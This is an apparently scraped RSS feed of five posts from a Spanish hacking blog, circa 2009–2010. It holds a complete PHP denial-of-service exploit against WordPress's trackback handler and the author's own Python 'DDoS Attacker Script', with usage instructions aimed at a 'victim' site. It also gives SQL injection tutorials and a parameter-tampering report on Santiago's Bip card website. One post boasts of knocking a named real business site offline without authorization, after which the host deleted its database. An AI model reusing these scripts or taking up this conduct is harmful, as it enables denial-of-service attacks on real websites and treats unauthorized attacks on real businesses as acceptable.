El rincón de Zerial » dos http://blog.zerial.org Informática, GNU/Linux, Seguridad, Hacking, Programación, Ocio Tue, 20 Jul 2010 18:13:34 +0000 en hourly 1 http://wordpress.org/?v=3.0 Vulnerabilidad en sistema de saldos y movimientos online de la Tarjeta BIP http://blog.zerial.org/seguridad/vulnerabilidad-en-sistema-de-saldos-y-movimientos-online-de-la-tarjeta-bip/ http://blog.zerial.org/seguridad/vulnerabilidad-en-sistema-de-saldos-y-movimientos-online-de-la-tarjeta-bip/#comments Thu, 11 Feb 2010 14:10:20 +0000 Zerial http://blog.zerial.org/?p=1516 Para los que no saben lo que es la tarjeta bip:

Este sistema de pago del transporte público de Santiago, tiene un sistema que nos permite monitorear en línea los saldos y los movimientos de nuestra tarjeta y de ésta forma saber dónde cargamos con dinero la tarjeta, en qué buses o metro la usamos, cuánto salgo nos queda, etc. Este sistema no es en tiempo real por lo que asumo que no saca los valores directamente de la base de datos del sistema de transporte, además desconozco si tiene permisos para escribir en la base de datos o solamente leer.
El sistema tiene un bug que nos puede permitir, con un poco de ingenio, hacer un ataque de denegación de servicio distibuido (DDoS) y dejar el sistema (de saldos y mov. en linea) offline y posiblemente realizar inyección de código SQL (SQL-Injection) . No me he puesto a investigar que otro impacto podría tener.

El sistema nos permite ver la cantidad de movimientos y saldos de nuestra tarjeta por periodos de mes actual, 60 y 90 días, sin embargo, es posible modificar esos valores alterando el atributo “value” del elemento del formulario. Si, así de sencillo.

Código HTML original:

Pruebas de concepto (PoC)

1. Modificamos el valor de “Mes Actual” por un número negativo.

Y ejecutamos la consulta:

2. Modificamos el valor de “Mes Actual” por el número 5.

Y ejecutamos la consulta:

Si se fijan en la fecha, podrán ver que sólo se mostró información desde hace 5 días.

3. Modificamos el valor de “Mes Actual” por una comilla para generar un error de sintáxis:

Y ejecutamos la consulta:

Si cambiamos el valor de “Mes Actual” a uno muy alto, por ejemplo 99999999999999999999999999999999999999 podemos ver cómo el sistema ya comienza a comportarse de forma extraña, por ejemplo ver la fecha:

Operación: Cartola de movimientos
Tarjeta bip!: 6547XXXXX
Fecha: 11/02/2010 10:57
Movimientos desde: 90/37/-2.7

De ésta forma podemos manejar arbitrariamente la consulta.

Queda más que demostrado que el famoso sistema para ver los saldos y movimientos en línea de la tarjeta bip no está validando los parametros de entrada y con un poco de ingenio podemos realizar distintos tipos de ataques. Se pueden generar simultaneamente consultas pesadas en el servidor, provocando su caída. Tambien, con un poco más de conocimientos y habilidades es posible lograr la inyección de código sql en la consulta.

Delicious Twitter Facebook Google Bookmarks FriendFeed Digg Slashdot Compartir/Guardar

]]> http://blog.zerial.org/seguridad/vulnerabilidad-en-sistema-de-saldos-y-movimientos-online-de-la-tarjeta-bip/feed/ 3 Denial-of-Service (DoS) rápido y de una forma muy sencilla en WordPress http://blog.zerial.org/seguridad/denial-of-service-dos-rapido-y-de-una-forma-muy-sencilla-en-wordpress/ http://blog.zerial.org/seguridad/denial-of-service-dos-rapido-y-de-una-forma-muy-sencilla-en-wordpress/#comments Sun, 18 Oct 2009 13:50:59 +0000 Zerial http://blog.zerial.org/?p=1014 pwnpressjcarlosn ha descubierto una vulnerabilidad en el fichero wp-trackbacks.php de wordpress, la cual nos permitiría hacer un tipo de denegación de servicio (DoS) con unas cuantas peticiones y sin necesidad de botnets o maquinas zombies.
Como él mismo nos cuenta:

Este error, es explotable desde cualquier conexión a internet, y no requiere de ordenadores zombies, ni de nada, son sólo 20 peticiones a lo sumo, desde una línea ADSL convencional, para dejar K.O. a cualquier servidor que hospede un blog basado en wordpress.

El problema fue reportado a la seguridad en wordpress.com y no se obtuvo respuesta, luego se intentó comunicar con el creador de wordpress y al pasar un par de días, obtuvo una respuesta de que lo solucionarán en algún momento pero no de la forma que él proponia, sino que ellos mismos buscarán cómo hacerlo.
La misma persona que hizo público este bug, publicó un exploit y una posible solución.

El exploit:

  1. < ?php
  2.     //wordpress Resource exhaustion Exploit
  3.     //http://rooibo.wordpress.com/
  4.     //security@wordpress.org contacted and get a response,
  5.     //but no solution available.
  6.     if(count($argv) < 2) {
  7.     echo “You need to specify a url to attack\n”;
  8.     exit;
  9.     }
  10.  
  11.     $url = $argv[1];
  12.  
  13.     $data = parse_url($url);
  14.     if(count($data) < 2) {
  15.     echo “The url should have http:// in front of it, and should be complete.\n”;
  16.     exit;
  17.     }
  18.  
  19.     if(count($data) == 2) {
  20.     $path = ”;
  21.     } else {
  22.     $path = $data[‘path’];
  23.     }
  24.     $path = trim($path,’/‘);
  25.    $path .= ‘/wp-trackback.php’;
  26.    if($path{0} != ‘/’) {
  27.    $path = ‘/’.$path;
  28.    }
  29.  
  30.    $b = “”;
  31.    $b = str_pad($b,140000,’ABCEDFG’);
  32.    $b = utf8_encode($b);
  33.    $charset = “”;
  34.    $charset = str_pad($charset,140000,”UTF-8,”);
  35.  
  36.    $str = ‘charset=’.urlencode($charset);
  37.    $str .= ‘&url=www.example.com’;
  38.    $str .= ‘&title=’.$b;
  39.    $str .= ‘&blog_name=lol’;
  40.    $str .= ‘&excerpt=lol’;
  41.  
  42.    $count = 0;
  43.    while(1) {
  44.    $fp = @fsockopen($data['host'],80);
  45.    if(!$fp) {
  46.    if($count > 0) {
  47.    echo “down!!!!\n”;
  48.    exit;
  49.    }
  50.    echo “unable to connect to: “.$data['host'].”\n”;
  51.    exit;
  52.    }
  53.  
  54.    fputs($fp, “POST $path HTTP/1.1\r\n”);
  55.    fputs($fp, “Host: “.$data['host'].”\r\n”);
  56.    fputs($fp, “Content-type: application/x-www-form-urlencoded\r\n”);
  57.    fputs($fp, “Content-length: “.strlen($str).”\r\n”);
  58.    fputs($fp, “Connection: close\r\n\r\n”);
  59.    fputs($fp, $str.”\r\n\r\n”);
  60.  
  61.    echo “hit!\n”;
  62.    $count++;
  63.    }
  64.  
  65.    ?>

La solución:

Cambiar

  1. $charset = $_POST[‘charset’];

Por

  1. $charset = str_replace(”,”,”",$_POST['charset']);
  2. if(is_array($charset)) { exit; }

Delicious Twitter Facebook Google Bookmarks FriendFeed Digg Slashdot Compartir/Guardar

]]> http://blog.zerial.org/seguridad/denial-of-service-dos-rapido-y-de-una-forma-muy-sencilla-en-wordpress/feed/ 1 DDoS Attacker Script: Peticiones automatizadas para lograr DoS http://blog.zerial.org/seguridad/ddos-attacker-script-peticiones-automatizadas-para-lograr-dos/ http://blog.zerial.org/seguridad/ddos-attacker-script-peticiones-automatizadas-para-lograr-dos/#comments Sun, 02 Aug 2009 19:26:52 +0000 Zerial http://blog.zerial.org/?p=709 DDoS Attacker Script” es un pequeño script que he escrito en python que nos sirve para lograr con éxito un ataque de denegación de servicio en un sitio web. Este script lo diseñe especialmente para ataques de sql injection.

El funcionamiento es muy sencillo, se conecta y hace una petición de la URI especificada:

  1. #!/usr/bin/python
  2. import socket, sys, os
  3. print "][ Attacking " + sys.argv[1]  + " ... ]["
  4. print "injecting " + sys.argv[2];
  5. def attack():   
  6.         #pid = os.fork()
  7.         s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  8.         s.connect((sys.argv[1], 80))
  9.         print ">> GET /" + sys.argv[2] + " HTTP/1.1"
  10.         s.send("GET /" + sys.argv[2] + " HTTP/1.1\r\n")
  11.         s.send("Host: " + sys.argv[1]  + "\r\n\r\n");
  12.         s.close()
  13. for i in range(1, 10):
  14.         attack()

La línea número 6 está comentada, si prefieren la pueden descomentar para ver lo que sucede.
El uso del script es de la siguiente forma:
$ python DDoS.py www.pagina.com SQLi
En www.pagina.com obviamente pondremos nuestra víctima y en SQLi, la cadena que hará el milagro, por ejemplo “ver_productos.php?id=55′ or ’1′=’1

Delicious Twitter Facebook Google Bookmarks FriendFeed Digg Slashdot Compartir/Guardar

]]> http://blog.zerial.org/seguridad/ddos-attacker-script-peticiones-automatizadas-para-lograr-dos/feed/ 2 Prueba de concepto: DDoS vía SQLi http://blog.zerial.org/seguridad/prueba-de-concepto-ddos-via-sqli/ http://blog.zerial.org/seguridad/prueba-de-concepto-ddos-via-sqli/#comments Sun, 02 Aug 2009 17:46:17 +0000 Zerial http://blog.zerial.org/?p=704 La semana pasada publiqué un artículo donde explicaba cómo llegar a realizar un ataque de denegación de servicio con éxito, pues bien, con un grupo de personas nos dedicamos a realizar una prueba de concepto y testear que tan eficáz era.

El primer paso fue encontrar un objetivo que tenga una vulnerabilidad SQLi, luego de eso ver hasta qué punto podemos inyectar código SQL para poder crear nuestra consulta pesada que genere la denegación de servicio.

El sitio objetivo fue http://maqval.cl (alojado en dreamhost), sitio que esta entre los “Sitios vulnerables” que he publicado. La consulta SQL que nos ayudó a realizar la denegación de servicio fue una con SELECT anidados usando la función BENCHMARK y repitiendo muchas veces  estas instrucciones. No sé si el sitio web corrigió las vulnerabilidades, por lo que no daré el string completo de la inyección sql.

Fuimos 2 o 3 personas las que ejecutamos la inyección sql y al pasar los segundos el sitio dejo de responder, mostrando el mensaje:

This Site is temporarily unavailable

Bastaron dos o tres peticiones para que el sitio cayera.
El sitio estuvo abajo toda la noche y al otro día. Me comuniqué con el encargado del hosting y me contó que lo estaban llamando los clientes para preguntar que sucedia con el sitio web, que los productos y precios no aparecian, etc. El encargado se conectó a la base de datos y se sio cuenta que no estaba, como si la hubiesen eliminado (drop database, delete…) me miró y yo le dije “Oops! Yo no fui, yo solo le hice DoS”, entonces él empezó a averiguar y claro, los de sotorpe soporte de dreamhosthabían eliminado la base de datos ya que consumia muchos recursos en el servidor y estaba comprometiendo el servicio de otros clientes, afortunadamente el encargado del hosting tenia un respaldo de la base de datos.

Bueno, con esto, lo único que queda decir, un ataque dirigido puede llegar a afectar a todos los usuarios y servicios de un servidor, logrando hasta que le cancelen la cuenta. La prueba de concepto fue realizada con éxito.

Delicious Twitter Facebook Google Bookmarks FriendFeed Digg Slashdot Compartir/Guardar

]]> http://blog.zerial.org/seguridad/prueba-de-concepto-ddos-via-sqli/feed/ 1 Cómo provocar un ataque DDoS mediante SQL Injection http://blog.zerial.org/seguridad/como-provocar-un-ataque-ddos-mediante-sql-injection/ http://blog.zerial.org/seguridad/como-provocar-un-ataque-ddos-mediante-sql-injection/#comments Tue, 21 Jul 2009 02:10:32 +0000 Zerial http://blog.zerial.org/?p=617 Más que enseñar a explotar esta vulnerabilidad para provocar un ataque de denegación de servicio, lo que busco es que los desarrolladores sepan la magnitud que puede tener una falla de este tipo (hay que encontrarle el lado white a las cosa :) .  Un ataque de denegación de servicio (DoS), como su nombre lo dice y en palabras simples, consiste en denegar un servicio para que éste deje de responder y se caiga. Este tipo de ataque se puede realizar de forma distribuida para que tenga mejor efecto, es decir, sincronizando y distribuyendo la carga y el ataque en distintas máquinas con el mismo objetivo.

Imágen: http://nsl.cs.columbia.edu(Imágen: http://nsl.cs.columbia.edu)

La teoría de esto es muy sencilla, pensemos que para hacer que un servicio deje de responder hay que hacer que se sature y esto se puede lograr de varias formas, muchas conexiones simultaneas, flood, synflood, etc. La forma que quiero enseñar es bastante más simple y consiste en modificar una consulta SQL, mediante SQL Injection, de manera tal que el servidor aumente considerablemente su carga y tiempo de respuesta hasta lograr el esperado denial of service.

Por ejemplo, pensemos en una tienda comercial que tiene en su base de datos miles (o millones) de productos, una tipica consulta para listar los productos de una categoría en particular sería:

SELECT id,producto,valor FROM productos WHERE categoria = (id de la categoría)

Y la URI sería algo como
http://sitio.com/tienda/productos.php?categoria=(id de la categoría).
Si este sitio permitiese inyectar código SQL podríamos modificar la consulta de manera tal que nos muestre todos los productos, sin importar la categoría, haciendo que la consulta quede de la siguiente forma:

SELECT id,producto,valor FROM productos WHERE categoria = (id de la categoría) OR 1 = 1

Para lograr esto, la dirección quedaría mas o menos asi:
http://sitio.com/tienda/productos.php?categoria=(id de la categoría)%20OR%201=1
Logrando que el sitio web nos muestre todos los productos y generando una carga mayor al servidor.

Si encontamos la forma de lograr la mayor carga en el servidor, podemos hacer un ataque sincronizado y distribuido para lograr nuestro objetivo: DDoS.
La distribución del ataque se puede realizar de distintas formas, muchos computadores atacando un sitio web o bien buscar las sitios web alojados en el mismo servidor o que usen el mismo recurso de base de datos y de esta forma generar más carga aún.

Está de más decir que esto es sólo una prueba de concepto y que si bien hay muchos sitios vulnerables a este tipo de ataque, la finalidad de todo esto es saber el alcance que puede tener una no-validación de datos.

Delicious Twitter Facebook Google Bookmarks FriendFeed Digg Slashdot Compartir/Guardar

]]> http://blog.zerial.org/seguridad/como-provocar-un-ataque-ddos-mediante-sql-injection/feed/ 15